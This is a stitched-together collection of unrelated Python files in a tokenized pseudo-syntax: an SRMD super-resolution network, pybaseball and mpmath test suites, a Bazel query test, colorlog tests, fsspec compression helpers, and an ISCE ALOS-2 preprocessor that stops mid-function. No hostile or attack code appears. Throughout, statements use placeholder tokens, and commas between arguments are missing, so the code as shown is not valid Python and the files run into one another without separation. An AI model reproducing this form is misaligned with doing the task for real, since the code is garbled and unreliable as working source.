<import_stmt>torch.nn<as>nn<import_stmt>models.basicblock<as>B<import_stmt>torch<line_sep>""" # -------------------------------------------- # SRMD (15 conv layers) # -------------------------------------------- Reference: @inproceedings{zhang2018learning, title={Learning a single convolutional super-resolution network for multiple degradations}, author={<NAME> and <NAME> and <NAME>}, booktitle={IEEE Conference on Computer Vision and Pattern Recognition}, pages={3262--3271}, year={2018} } http://openaccess.thecvf.com/content_cvpr_2018/papers/Zhang_Learning_a_Single_CVPR_2018_paper.pdf """<line_sep># -------------------------------------------- # SRMD (SRMD, in_nc = 3+15+1 = 19) # SRMD (SRMDNF, in_nc = 3+15 = 18) # -------------------------------------------- <class_stmt>SRMD(nn.Module)<block_start><def_stmt>__init__ self in_nc=19 out_nc=3 nc=128 nb=12 upscale=4 act_mode='R' upsample_mode='pixelshuffle'<block_start>""" # ------------------------------------ in_nc: channel number of input, default: 3+15 out_nc: channel number of output nc: channel number nb: total number of conv layers upscale: scale factor act_mode: batch norm + activation function; 'BR' means BN+ReLU upsample_mode: default 'pixelshuffle' = conv + pixelshuffle # ------------------------------------ """<line_sep>super(SRMD self).__init__()<assert_stmt>'R'<in>act_mode<or>'L'<in>act_mode 'Examples of activation function: R, L, BR, BL, IR, IL'<line_sep>bias=<true><if_stmt>upsample_mode<eq>'upconv'<block_start>upsample_block=B.upsample_upconv<block_end><elif_stmt>upsample_mode<eq>'pixelshuffle'<block_start>upsample_block=B.upsample_pixelshuffle<block_end><elif_stmt>upsample_mode<eq>'convtranspose'<block_start>upsample_block=B.upsample_convtranspose<block_end><else_stmt><block_start><raise>NotImplementedError('upsample mode [{:s}] is not found'.format(upsample_mode))<block_end>m_head=B.conv(in_nc nc mode='C'+act_mode[-1] bias=bias)<line_sep>m_body=[B.conv(nc nc mode='C'+act_mode bias=bias)<for>_ 
range(nb-2)]<line_sep>m_tail=upsample_block(nc out_nc mode=str(upscale) bias=bias)<line_sep>self.model=B.sequential(m_head *m_body m_tail)<block_end># def forward(self, x, k_pca): # m = k_pca.repeat(1, 1, x.size()[-2], x.size()[-1]) # x = torch.cat((x, m), 1) # x = self.body(x) <def_stmt>forward self x<block_start>x=self.model(x)<line_sep><return>x<block_end><block_end><if_stmt>__name__<eq>'__main__'<block_start><import_from_stmt>utils utils_model<line_sep>model=SRMD(in_nc=18 out_nc=3 nc=64 nb=15 upscale=4 act_mode='R' upsample_mode='pixelshuffle')<line_sep>print(utils_model.describe_model(model))<line_sep>x=torch.randn((2 3 100 100))<line_sep>k_pca=torch.randn(2 15 1 1)<line_sep>x=model(x k_pca)<line_sep>print(x.shape)<line_sep># run models/network_srmd.py <block_end>
<import_stmt>pytest<import_stmt>pandas<as>pd<import_from_stmt>pandas.testing assert_frame_equal assert_series_equal<import_from_stmt>pybaseball.plotting transform_coordinates<line_sep>@pytest.fixture<def_stmt>coords <block_start><return>pd.DataFrame({"x":[1.0 2.0 -1.0] "y":[1.0 0.0 10.0]})<block_end><def_stmt>test_transform_coordinates_identity_scale coords<block_start>transformed_coords=transform_coordinates(coords scale=1)<line_sep>assert_series_equal(coords.x transformed_coords.x)<line_sep>assert_series_equal(-coords.y transformed_coords.y)<block_end><def_stmt>test_transform_coordinates coords<block_start>transformed_coords=transform_coordinates(coords scale=2 x_center=0 y_center=0)<line_sep>assert_series_equal(2<times>coords.x transformed_coords.x)<line_sep>assert_series_equal(-2<times>coords.y transformed_coords.y)<line_sep>transformed_coords=transform_coordinates(coords scale=2 x_center=1 y_center=1)<line_sep>expected=pd.DataFrame({"x":[1.0 3.0 -3.0] "y":[-1.0 1.0 -19.0]})<line_sep>assert_frame_equal(expected transformed_coords)<line_sep>xc=123.4<line_sep>yc=432.1<line_sep>transformed_coords=transform_coordinates(coords scale=0 x_center=xc y_center=yc)<line_sep>assert_series_equal(pd.Series(name="x" data=3<times>[xc]) transformed_coords.x)<line_sep>assert_series_equal(pd.Series(name="y" data=3<times>[yc]) -transformed_coords.y)<block_end>
# TODO: don't use round <import_from_future_stmt> division<import_from_stmt>sympy.mpmath *<line_sep>xrange=libmp.backend.xrange<line_sep># XXX: these shouldn't be visible(?) LU_decomp=mp.LU_decomp<line_sep>L_solve=mp.L_solve<line_sep>U_solve=mp.U_solve<line_sep>householder=mp.householder<line_sep>improve_solution=mp.improve_solution<line_sep>A1=matrix([[3 1 6] [2 1 3] [1 1 1]])<line_sep>b1=[2 7 4]<line_sep>A2=matrix([[2 -1 -1 2] [6 -2 3 -1] [-4 2 3 -2] [2 0 4 -3]])<line_sep>b2=[3 -3 -2 -1]<line_sep>A3=matrix([[1 0 -1 -1 0] [0 1 1 0 -1] [4 -5 2 0 0] [0 0 -2 9 -12] [0 5 0 0 12]])<line_sep>b3=[0 0 0 0 50]<line_sep>A4=matrix([[10.235 -4.56 0. -0.035 5.67] [-2.463 1.27 3.97 -8.63 1.08] [-6.58 0.86 -0.257 9.32 -43.6] [9.83 7.39 -17.25 0.036 24.86] [-9.31 34.9 78.56 1.07 65.8]])<line_sep>b4=[8.95 20.54 7.42 5.60 58.43]<line_sep>A5=matrix([[1 2 -4] [-2 -3 5] [3 5 -8]])<line_sep>A6=matrix([[1.377360 2.481400 5.359190] [2.679280 -1.229560 25.560210] [-1.225280+1.e6 9.910180 -35.049900-1.e6]])<line_sep>b6=[23.500000 -15.760000 2.340000]<line_sep>A7=matrix([[1 -0.5] [2 1] [-2 6]])<line_sep>b7=[3 2 -4]<line_sep>A8=matrix([[1 2 3] [-1 0 1] [-1 -2 -1] [1 0 -1]])<line_sep>b8=[1 2 3 4]<line_sep>A9=matrix([[4 2 -2] [2 5 -4] [-2 -4 5.5]])<line_sep>b9=[10 16 -15.5]<line_sep>A10=matrix([[1.0+1.0j 2.0 2.0] [4.0 5.0 6.0] [7.0 8.0 9.0]])<line_sep>b10=[1.0 1.0+1.0j 1.0]<def_stmt>test_LU_decomp <block_start>A=A3.copy()<line_sep>b=b3<line_sep>A,p=LU_decomp(A)<line_sep>y=L_solve(A b p)<line_sep>x=U_solve(A y)<assert_stmt>p<eq>[2 1 2 3]<assert_stmt>[round(i 14)<for>i x]<eq>[3.78953107960742 2.9989094874591098 -0.081788440567070006 3.8713195201744801 2.9171210468920399]<line_sep>A=A4.copy()<line_sep>b=b4<line_sep>A,p=LU_decomp(A)<line_sep>y=L_solve(A b p)<line_sep>x=U_solve(A y)<assert_stmt>p<eq>[0 3 4 3]<assert_stmt>[round(i 14)<for>i x]<eq>[2.6383625899619201 2.6643834462368399 0.79208015947958998 -2.5088376454101899 
-1.0567657691375001]<line_sep>A=randmatrix(3)<line_sep>bak=A.copy()<line_sep>LU_decomp(A overwrite=1)<assert_stmt>A<ne>bak<block_end><def_stmt>test_inverse <block_start><for_stmt>A [A1 A2 A5]<block_start>inv=inverse(A)<assert_stmt>mnorm(A<times>inv-eye(A.rows) 1)<l>1.e-14<block_end><block_end><def_stmt>test_householder <block_start>mp.dps=15<line_sep>A,b=A8 b8<line_sep>H,p,x,r=householder(extend(A b))<assert_stmt>H<eq>matrix([[mpf('3.0') mpf('-2.0') mpf('-1.0') 0] [-1.0 mpf('3.333333333333333') mpf('-2.9999999999999991') mpf('2.0')] [-1.0 mpf('-0.66666666666666674') mpf('2.8142135623730948') mpf('-2.8284271247461898')] [1.0 mpf('-1.3333333333333333') mpf('-0.20000000000000018') mpf('4.2426406871192857')]])<assert_stmt>p<eq>[-2 -2 mpf('-1.4142135623730949')]<assert_stmt>round(norm(r 2) 10)<eq>4.2426406870999998<line_sep>y=[102.102 58.344 36.463 24.310 17.017 12.376 9.282 7.140 5.610 4.488 3.6465 3.003]<def_stmt>coeff n# similiar to Hilbert matrix <block_start>A=[]<for_stmt>i range(1 13)<block_start>A.append([1./(i+j-1)<for>j range(1 n+1)])<block_end><return>matrix(A)<block_end>residuals=[]<line_sep>refres=[]<for_stmt>n range(2 7)<block_start>A=coeff(n)<line_sep>H,p,x,r=householder(extend(A y))<line_sep>x=matrix(x)<line_sep>y=matrix(y)<line_sep>residuals.append(norm(r 2))<line_sep>refres.append(norm(residual(A x y) 2))<block_end><assert_stmt>[round(res 10)<for>res residuals]<eq>[15.1733888877 0.82378073210000002 0.302645887 0.0260109244 0.00058653999999999998]<assert_stmt>norm(matrix(residuals)-matrix(refres) inf)<l>1.e-13<block_end><def_stmt>test_factorization <block_start>A=randmatrix(5)<line_sep>P,L,U=lu(A)<assert_stmt>mnorm(P<times>A-L<times>U 1)<l>1.e-15<block_end><def_stmt>test_solve <block_start><assert_stmt>norm(residual(A6 lu_solve(A6 b6) b6) inf)<l>1.e-10<assert_stmt>norm(residual(A7 lu_solve(A7 b7) b7) inf)<l>1.5<assert_stmt>norm(residual(A8 lu_solve(A8 b8) b8) inf)<le>3+1.e-10<assert_stmt>norm(residual(A6 qr_solve(A6 b6)[0] b6) 
inf)<l>1.e-10<assert_stmt>norm(residual(A7 qr_solve(A7 b7)[0] b7) inf)<l>1.5<assert_stmt>norm(residual(A8 qr_solve(A8 b8)[0] b8) 2)<le>4.3<assert_stmt>norm(residual(A10 lu_solve(A10 b10) b10) 2)<l>1.e-10<assert_stmt>norm(residual(A10 qr_solve(A10 b10)[0] b10) 2)<l>1.e-10<block_end><def_stmt>test_solve_overdet_complex <block_start>A=matrix([[1 2j] [3 4j] [5 6]])<line_sep>b=matrix([1+j 2 -j])<assert_stmt>norm(residual(A lu_solve(A b) b))<l>1.0208<block_end><def_stmt>test_singular <block_start>mp.dps=15<line_sep>A=[[5.6 1.2] [7./15 .1]]<line_sep>B=repr(zeros(2))<line_sep>b=[1 2]<def_stmt>_assert_ZeroDivisionError statement<block_start><try_stmt><block_start>eval(statement)<assert_stmt><false><block_end><except_stmt>(ZeroDivisionError ValueError)<block_start><pass><block_end><block_end><for_stmt>i ['lu_solve(%s, %s)'%(A b) 'lu_solve(%s, %s)'%(B b) 'qr_solve(%s, %s)'%(A b) 'qr_solve(%s, %s)'%(B b)]<block_start>_assert_ZeroDivisionError(i)<block_end><block_end><def_stmt>test_cholesky <block_start><assert_stmt>fp.cholesky(fp.matrix(A9))<eq>fp.matrix([[2 0 0] [1 2 0] [-1 -3/2 3/2]])<line_sep>x=fp.cholesky_solve(A9 b9)<assert_stmt>fp.norm(fp.residual(A9 x b9) fp.inf)<eq>0<block_end><def_stmt>test_det <block_start><assert_stmt>det(A1)<eq>1<assert_stmt>round(det(A2) 14)<eq>8<assert_stmt>round(det(A3))<eq>1834<assert_stmt>round(det(A4))<eq>4443376<assert_stmt>det(A5)<eq>1<assert_stmt>round(det(A6))<eq>78356463<assert_stmt>det(zeros(3))<eq>0<block_end><def_stmt>test_cond <block_start>mp.dps=15<line_sep>A=matrix([[1.2969 0.8648] [0.2161 0.1441]])<assert_stmt>cond(A <lambda>x:mnorm(x 1))<eq>mpf('327065209.73817754')<assert_stmt>cond(A <lambda>x:mnorm(x inf))<eq>mpf('327065209.73817754')<assert_stmt>cond(A <lambda>x:mnorm(x 'F'))<eq>mpf('249729266.80008656')<block_end>@extradps(50)<def_stmt>test_precision <block_start>A=randmatrix(10 10)<assert_stmt>mnorm(inverse(inverse(A))-A 1)<l>1.e-45<block_end><def_stmt>test_interval_matrix 
<block_start>mp.dps=15<line_sep>iv.dps=15<line_sep>a=iv.matrix([['0.1' '0.3' '1.0'] ['7.1' '5.5' '4.8'] ['3.2' '4.4' '5.6']])<line_sep>b=iv.matrix(['4' '0.6' '0.5'])<line_sep>c=iv.lu_solve(a b)<assert_stmt>c[0].delta<l>1e-13<assert_stmt>c[1].delta<l>1e-13<assert_stmt>c[2].delta<l>1e-13<assert_stmt>5.25823271130625686059275<in>c[0]<assert_stmt>-13.155049396267837541163<in>c[1]<assert_stmt>7.42069154774972557628979<in>c[2]<block_end><def_stmt>test_LU_cache <block_start>A=randmatrix(3)<line_sep>LU=LU_decomp(A)<assert_stmt>A._LU<eq>LU_decomp(A)<line_sep>A[0 0]=-1000<assert_stmt>A._LU<is><none><block_end><def_stmt>test_improve_solution <block_start>A=randmatrix(5 min=1e-20 max=1e20)<line_sep>b=randmatrix(5 1 min=-1000 max=1000)<line_sep>x1=lu_solve(A b)+randmatrix(5 1 min=-1e-5 max=1.e-5)<line_sep>x2=improve_solution(A x1 b)<assert_stmt>norm(residual(A x2 b) 2)<l>norm(residual(A x1 b) 2)<block_end><def_stmt>test_exp_pade <block_start><for_stmt>i range(3)<block_start>dps=15<line_sep>extra=15<line_sep>mp.dps=dps+extra<line_sep>dm=0<line_sep>N=3<line_sep>dg=range(1 N+1)<line_sep>a=diag(dg)<line_sep>expa=diag([exp(x)<for>x dg])<line_sep># choose a random matrix not close to be singular # to avoid adding too much extra precision in computing # m**-1 * M * m <while_stmt>abs(dm)<l>0.01<block_start>m=randmatrix(N)<line_sep>dm=det(m)<block_end>m=m/dm<line_sep>a1=m<power>-1<times>a<times>m<line_sep>e2=m<power>-1<times>expa<times>m<line_sep>mp.dps=dps<line_sep>e1=expm(a1 method='pade')<line_sep>mp.dps=dps+extra<line_sep>d=e2-e1<line_sep>#print d mp.dps=dps<assert_stmt>norm(d inf).ae(0)<block_end>mp.dps=15<block_end><def_stmt>test_qr <block_start>mp.dps=15# used default value for dps lowlimit=-9# lower limit of matrix element value uplimit=9# uppter limit of matrix element value maxm=4# max matrix size flg=<false># toggle to create real vs complex matrix zero=mpf('0.0')<for_stmt>k xrange(0 10)<block_start>exdps=0<line_sep>mode='full'<line_sep>flg=bool(k%2)<line_sep># generate 
arbitrary matrix size (2 to maxm) num1=nint(2+(maxm-2)<times>rand())<line_sep>num2=nint(2+(maxm-2)<times>rand())<line_sep>m=int(max(num1 num2))<line_sep>n=int(min(num1 num2))<line_sep># create matrix A=mp.matrix(m n)<line_sep># populate matrix values with arbitrary integers <if_stmt>flg<block_start>flg=<false><line_sep>dtype='complex'<for_stmt>j xrange(0 n)<block_start><for_stmt>i xrange(0 m)<block_start>val=nint(lowlimit+(uplimit-lowlimit)<times>rand())<line_sep>val2=nint(lowlimit+(uplimit-lowlimit)<times>rand())<line_sep>A[i j]=mpc(val val2)<block_end><block_end><block_end><else_stmt><block_start>flg=<true><line_sep>dtype='real'<for_stmt>j xrange(0 n)<block_start><for_stmt>i xrange(0 m)<block_start>val=nint(lowlimit+(uplimit-lowlimit)<times>rand())<line_sep>A[i j]=mpf(val)<block_end><block_end><block_end># perform A -> QR decomposition Q,R=qr(A mode edps=exdps)<line_sep>#print('\n\n A = \n', nstr(A, 4)) #print('\n Q = \n', nstr(Q, 4)) #print('\n R = \n', nstr(R, 4)) #print('\n Q*R = \n', nstr(Q*R, 4)) maxnorm=mpf('1.0E-11')<line_sep>n1=norm(A-Q<times>R)<line_sep>#print '\n Norm of A - Q * R = ', n1 <if_stmt>n1<g>maxnorm<block_start><raise>ValueError('Excessive norm value')<block_end><if_stmt>dtype<eq>'real'<block_start>n1=norm(eye(m)-Q.T<times>Q)<line_sep>#print ' Norm of I - Q.T * Q = ', n1 <if_stmt>n1<g>maxnorm<block_start><raise>ValueError('Excessive norm value')<block_end>n1=norm(eye(m)-Q<times>Q.T)<line_sep>#print ' Norm of I - Q * Q.T = ', n1 <if_stmt>n1<g>maxnorm<block_start><raise>ValueError('Excessive norm value')<block_end><block_end><if_stmt>dtype<eq>'complex'<block_start>n1=norm(eye(m)-Q.T<times>Q.conjugate())<line_sep>#print ' Norm of I - Q.T * Q.conjugate() = ', n1 <if_stmt>n1<g>maxnorm<block_start><raise>ValueError('Excessive norm value')<block_end>n1=norm(eye(m)-Q.conjugate()<times>Q.T)<line_sep>#print ' Norm of I - Q.conjugate() * Q.T = ', n1 <if_stmt>n1<g>maxnorm<block_start><raise>ValueError('Excessive norm 
value')<block_end><block_end><block_end><block_end>
# pylint: disable=g-bad-file-header # Copyright 2018 The Bazel Authors. All rights reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. <import_stmt>unittest<import_from_stmt>src.test.py.bazel test_base<class_stmt>QueryTest(test_base.TestBase)<block_start><def_stmt>testSimpleQuery self<block_start>self.ScratchFile('WORKSPACE')<line_sep>self.ScratchFile('foo/BUILD' ['exports_files(["exported.txt"])' 'filegroup(name = "top-rule", srcs = [":dep-rule"])' 'filegroup(name = "dep-rule", srcs = ["src.txt"])' ])<line_sep>self.ScratchFile('foo/src.txt')<line_sep>self.ScratchFile('foo/exported.txt')<line_sep>self.ScratchFile('foo/non-exported.txt')<line_sep>self._AssertQueryOutput('//foo:top-rule' '//foo:top-rule')<line_sep>self._AssertQueryOutput('//foo:*' '//foo:top-rule' '//foo:dep-rule' '//foo:src.txt' '//foo:exported.txt' '//foo:BUILD')<line_sep>self._AssertQueryOutput('deps(//foo:top-rule)' '//foo:top-rule' '//foo:dep-rule' '//foo:src.txt')<line_sep>self._AssertQueryOutput('deps(//foo:top-rule, 1)' '//foo:top-rule' '//foo:dep-rule')<block_end><def_stmt>_AssertQueryOutput self query_expr *expected_results<block_start>exit_code,stdout,stderr=self.RunBazel(['query' query_expr])<line_sep>self.AssertExitCode(exit_code 0 stderr)<line_sep>stdout=sorted(x<for>x stdout<if>x)<line_sep>self.assertEqual(len(stdout) len(expected_results))<line_sep>self.assertListEqual(stdout sorted(expected_results))<block_end><block_end><if_stmt>__name__<eq>'__main__'<block_start>unittest.main()<block_end>
"""Test the colorlog.colorlog module."""<import_stmt>sys<import_stmt>pytest<def_stmt>test_colored_formatter create_and_test_logger<block_start>create_and_test_logger()<block_end><def_stmt>test_custom_colors create_and_test_logger<block_start>"""Disable all colors and check no escape codes are output."""<line_sep>create_and_test_logger(log_colors={} reset=<false> validator=<lambda>line:'\x1b['<not><in>line)<block_end><def_stmt>test_reset create_and_test_logger<block_start>create_and_test_logger(reset=<true> validator=<lambda>l:l.endswith('\x1b[0m'))<block_end><def_stmt>test_no_reset create_and_test_logger<block_start>create_and_test_logger(fmt="%(reset)s%(log_color)s%(levelname)s:%(name)s:%(message)s" reset=<false> # Check that each line does not end with an escape code validator=<lambda>line:<not>line.endswith('\x1b[0m'))<block_end><def_stmt>test_secondary_colors create_and_test_logger<block_start>expected=':\x1b[31mtest_secondary_colors:\x1b[34m'<line_sep>create_and_test_logger(fmt=("%(log_color)s%(levelname)s:"<concat>"%(name_log_color)s%(name)s:"<concat>"%(message_log_color)s%(message)s") secondary_log_colors={'name':{'DEBUG':'red' 'INFO':'red' 'WARNING':'red' 'ERROR':'red' 'CRITICAL':'red' } 'message':{'DEBUG':'blue' 'INFO':'blue' 'WARNING':'blue' 'ERROR':'blue' 'CRITICAL':'blue' }} validator=<lambda>line:expected<in>line)<block_end><def_stmt>test_some_secondary_colors create_and_test_logger<block_start>lines=create_and_test_logger(fmt="%(message_log_color)s%(message)s" secondary_log_colors={'message':{'ERROR':'red' 'CRITICAL':'red'}})<line_sep># Check that only two lines are colored <assert_stmt>len([l<for>l lines<if>'\x1b[31m'<in>l])<eq>2<block_end>@pytest.mark.skipif(sys.version_info<l>(3 2) reason="requires python3.2")<def_stmt>test_braces_style create_and_test_logger<block_start>create_and_test_logger(fmt='{log_color}{levelname}:{name}:{message}' style='{')<block_end>@pytest.mark.skipif(sys.version_info<l>(3 2) reason="requires 
python3.2")<def_stmt>test_template_style create_and_test_logger<block_start>create_and_test_logger(fmt='${log_color}${levelname}:${name}:${message}' style='$')<block_end>
"""Helper functions for a standard streaming compression API"""<import_from_stmt>bz2 BZ2File<import_from_stmt>gzip GzipFile<import_from_stmt>zipfile ZipFile<import_stmt>fsspec.utils<import_from_stmt>fsspec.spec AbstractBufferedFile<def_stmt>noop_file file mode **kwargs<block_start><return>file<block_end># should be functions of the form func(infile, mode=, **kwargs) -> file-like compr={<none>:noop_file}<def_stmt>register_compression name callback extensions force=<false><block_start>"""Register an "inferable" file compression type. Registers transparent file compression type for use with fsspec.open. Compression can be specified by name in open, or "infer"-ed for any files ending with the given extensions. Args: name: (str) The compression type name. Eg. "gzip". callback: A callable of form (infile, mode, **kwargs) -> file-like. Accepts an input file-like object, the target mode and kwargs. Returns a wrapped file-like object. extensions: (str, Iterable[str]) A file extension, or list of file extensions for which to infer this compression scheme. Eg. "gz". force: (bool) Force re-registration of compression type or extensions. Raises: ValueError: If name or extensions already registered, and not force. 
"""<if_stmt>isinstance(extensions str)<block_start>extensions=[extensions]<block_end># Validate registration <if_stmt>name<in>compr<and><not>force<block_start><raise>ValueError("Duplicate compression registration: %s"%name)<block_end><for_stmt>ext extensions<block_start><if_stmt>ext<in>fsspec.utils.compressions<and><not>force<block_start><raise>ValueError("Duplicate compression file extension: %s (%s)"%(ext name))<block_end><block_end>compr[name]=callback<for_stmt>ext extensions<block_start>fsspec.utils.compressions[ext]=name<block_end><block_end><def_stmt>unzip infile mode="rb" filename=<none> **kwargs<block_start><if_stmt>"r"<not><in>mode<block_start>filename=filename<or>"file"<line_sep>z=ZipFile(infile mode="w" **kwargs)<line_sep>fo=z.open(filename mode="w")<line_sep>fo.close=<lambda>closer=fo.close:closer()<or>z.close()<line_sep><return>fo<block_end>z=ZipFile(infile)<if_stmt>filename<is><none><block_start>filename=z.namelist()[0]<block_end><return>z.open(filename mode="r" **kwargs)<block_end>register_compression("zip" unzip "zip")<line_sep>register_compression("bz2" BZ2File "bz2")<line_sep>register_compression("gzip" <lambda>f **kwargs:GzipFile(fileobj=f **kwargs) "gz")<try_stmt><block_start><import_stmt>lzma<line_sep>register_compression("lzma" lzma.LZMAFile "xz")<line_sep>register_compression("xz" lzma.LZMAFile "xz" force=<true>)<block_end><except_stmt>ImportError<block_start><pass><block_end><try_stmt><block_start><import_stmt>lzmaffi<line_sep>register_compression("lzma" lzmaffi.LZMAFile "xz" force=<true>)<line_sep>register_compression("xz" lzmaffi.LZMAFile "xz" force=<true>)<block_end><except_stmt>ImportError<block_start><pass><block_end><class_stmt>SnappyFile(AbstractBufferedFile)<block_start><def_stmt>__init__ self infile mode **kwargs<block_start><import_stmt>snappy<line_sep>self.details={"size":999999999}# not true, but OK if we don't seek super().__init__(fs=<none> path="snappy" mode=mode.strip("b")+"b" 
**kwargs)<line_sep>self.infile=infile<if_stmt>"r"<in>mode<block_start>self.codec=snappy.StreamDecompressor()<block_end><else_stmt><block_start>self.codec=snappy.StreamCompressor()<block_end><block_end><def_stmt>_upload_chunk self final=<false><block_start>self.buffer.seek(0)<line_sep>out=self.codec.add_chunk(self.buffer.read())<line_sep>self.infile.write(out)<line_sep><return><true><block_end><def_stmt>seek self loc whence=0<block_start><raise>NotImplementedError("SnappyFile is not seekable")<block_end><def_stmt>seekable self<block_start><return><false><block_end><def_stmt>_fetch_range self start end<block_start>"""Get the specified set of bytes from remote"""<line_sep>data=self.infile.read(end-start)<line_sep><return>self.codec.decompress(data)<block_end><block_end><try_stmt><block_start><import_stmt>snappy<line_sep>snappy.compress<line_sep># Snappy may use the .sz file extension, but this is not part of the # standard implementation. register_compression("snappy" SnappyFile [])<block_end><except_stmt>(ImportError NameError)<block_start><pass><block_end><try_stmt><block_start><import_stmt>lz4.frame<line_sep>register_compression("lz4" lz4.frame.open "lz4")<block_end><except_stmt>ImportError<block_start><pass><block_end><try_stmt><block_start><import_stmt>zstandard<as>zstd<def_stmt>zstandard_file infile mode="rb"<block_start><if_stmt>"r"<in>mode<block_start>cctx=zstd.ZstdDecompressor()<line_sep><return>cctx.stream_reader(infile)<block_end><else_stmt><block_start>cctx=zstd.ZstdCompressor(level=10)<line_sep><return>cctx.stream_writer(infile)<block_end><block_end>register_compression("zstd" zstandard_file "zst")<block_end><except_stmt>ImportError<block_start><pass><block_end>
# # Author: <NAME> # Copyright 2015-present, NASA-JPL/Caltech # <import_stmt>os<import_stmt>glob<import_stmt>logging<import_stmt>datetime<import_stmt>numpy<as>np<import_stmt>isceobj<import_stmt>isceobj.Sensor.MultiMode<as>MultiMode<import_from_stmt>isceobj.Planet.Planet Planet<import_from_stmt>isceobj.Alos2Proc.Alos2ProcPublic runCmd<import_from_stmt>isceobj.Alos2Proc.Alos2ProcPublic getBboxRdr<import_from_stmt>isceobj.Alos2Proc.Alos2ProcPublic getBboxGeo<import_from_stmt>isceobj.Alos2Proc.Alos2ProcPublic modeProcParDict<line_sep>logger=logging.getLogger('isce.alos2insar.runPreprocessor')<def_stmt>runPreprocessor self<block_start>'''Extract images. '''<line_sep>catalog=isceobj.Catalog.createCatalog(self._insar.procDoc.name)<line_sep>#find files #actually no need to use absolute path any longer, since we are able to find file from vrt now. 27-JAN-2020, CRL. #denseoffset may still need absolute path when making links self.referenceDir=os.path.abspath(self.referenceDir)<line_sep>self.secondaryDir=os.path.abspath(self.secondaryDir)<line_sep>ledFilesReference=sorted(glob.glob(os.path.join(self.referenceDir 'LED-ALOS2*-*-*')))<line_sep>imgFilesReference=sorted(glob.glob(os.path.join(self.referenceDir 'IMG-{}-ALOS2*-*-*'.format(self.referencePolarization.upper()))))<line_sep>ledFilesSecondary=sorted(glob.glob(os.path.join(self.secondaryDir 'LED-ALOS2*-*-*')))<line_sep>imgFilesSecondary=sorted(glob.glob(os.path.join(self.secondaryDir 'IMG-{}-ALOS2*-*-*'.format(self.secondaryPolarization.upper()))))<line_sep>firstFrameReference=ledFilesReference[0].split('-')[-3][-4:]<line_sep>firstFrameSecondary=ledFilesSecondary[0].split('-')[-3][-4:]<line_sep>firstFrameImagesReference=sorted(glob.glob(os.path.join(self.referenceDir 'IMG-{}-ALOS2*{}-*-*'.format(self.referencePolarization.upper() firstFrameReference))))<line_sep>firstFrameImagesSecondary=sorted(glob.glob(os.path.join(self.secondaryDir 'IMG-{}-ALOS2*{}-*-*'.format(self.secondaryPolarization.upper() 
firstFrameSecondary))))<line_sep>#determin operation mode referenceMode=os.path.basename(ledFilesReference[0]).split('-')[-1][0:3]<line_sep>secondaryMode=os.path.basename(ledFilesSecondary[0]).split('-')[-1][0:3]<line_sep>spotlightModes=['SBS']<line_sep>stripmapModes=['UBS' 'UBD' 'HBS' 'HBD' 'HBQ' 'FBS' 'FBD' 'FBQ']<line_sep>scansarNominalModes=['WBS' 'WBD' 'WWS' 'WWD']<line_sep>scansarWideModes=['VBS' 'VBD']<line_sep>scansarModes=['WBS' 'WBD' 'WWS' 'WWD' 'VBS' 'VBD']<line_sep>#usable combinations <if_stmt>(referenceMode<in>spotlightModes)<and>(secondaryMode<in>spotlightModes)<block_start>self._insar.modeCombination=0<block_end><elif_stmt>(referenceMode<in>stripmapModes)<and>(secondaryMode<in>stripmapModes)<block_start>self._insar.modeCombination=1<block_end><elif_stmt>(referenceMode<in>scansarNominalModes)<and>(secondaryMode<in>scansarNominalModes)<block_start>self._insar.modeCombination=21<block_end><elif_stmt>(referenceMode<in>scansarWideModes)<and>(secondaryMode<in>scansarWideModes)<block_start>self._insar.modeCombination=22<block_end><elif_stmt>(referenceMode<in>scansarNominalModes)<and>(secondaryMode<in>stripmapModes)<block_start>self._insar.modeCombination=31<block_end><elif_stmt>(referenceMode<in>scansarWideModes)<and>(secondaryMode<in>stripmapModes)<block_start>self._insar.modeCombination=32<block_end><else_stmt><block_start>print('\n\nthis mode combination is not possible')<line_sep>print('note that for ScanSAR-stripmap, ScanSAR must be reference\n\n')<line_sep><raise>Exception('mode combination not supported')<block_end># pixel size from real data processing. azimuth pixel size may change a bit as # the antenna points to a different swath and therefore uses a different PRF. 
# MODE RANGE PIXEL SIZE (LOOKS) AZIMUTH PIXEL SIZE (LOOKS) # ------------------------------------------------------------------- # SPT [SBS] # 1.4304222392897463 (2) 0.9351804642158579 (4) # SM1 [UBS,UBD] # 1.4304222392897463 (2) 1.8291988125114438 (2) # SM2 [HBS,HBD,HBQ] # 2.8608444785794984 (2) 3.0672373839847196 (2) # SM3 [FBS,FBD,FBQ] # 4.291266717869248 (2) 3.2462615913656667 (4) # WD1 [WBS,WBD] [WWS,WWD] # 8.582533435738496 (1) 2.6053935830031887 (14) # 8.582533435738496 (1) 2.092362043327227 (14) # 8.582533435738496 (1) 2.8817632034495717 (14) # 8.582533435738496 (1) 3.054362492601842 (14) # 8.582533435738496 (1) 2.4582084463356977 (14) # WD2 [VBS,VBD] # 8.582533435738496 (1) 2.9215796012950728 (14) # 8.582533435738496 (1) 3.088859074497863 (14) # 8.582533435738496 (1) 2.8792293071133073 (14) # 8.582533435738496 (1) 3.0592146044234854 (14) # 8.582533435738496 (1) 2.8818767752199137 (14) # 8.582533435738496 (1) 3.047038521027477 (14) # 8.582533435738496 (1) 2.898816222039108 (14) #determine default number of looks: self._insar.numberRangeLooks1=self.numberRangeLooks1<line_sep>self._insar.numberAzimuthLooks1=self.numberAzimuthLooks1<line_sep>self._insar.numberRangeLooks2=self.numberRangeLooks2<line_sep>self._insar.numberAzimuthLooks2=self.numberAzimuthLooks2<line_sep>#the following two will be automatically determined by runRdrDemOffset.py 
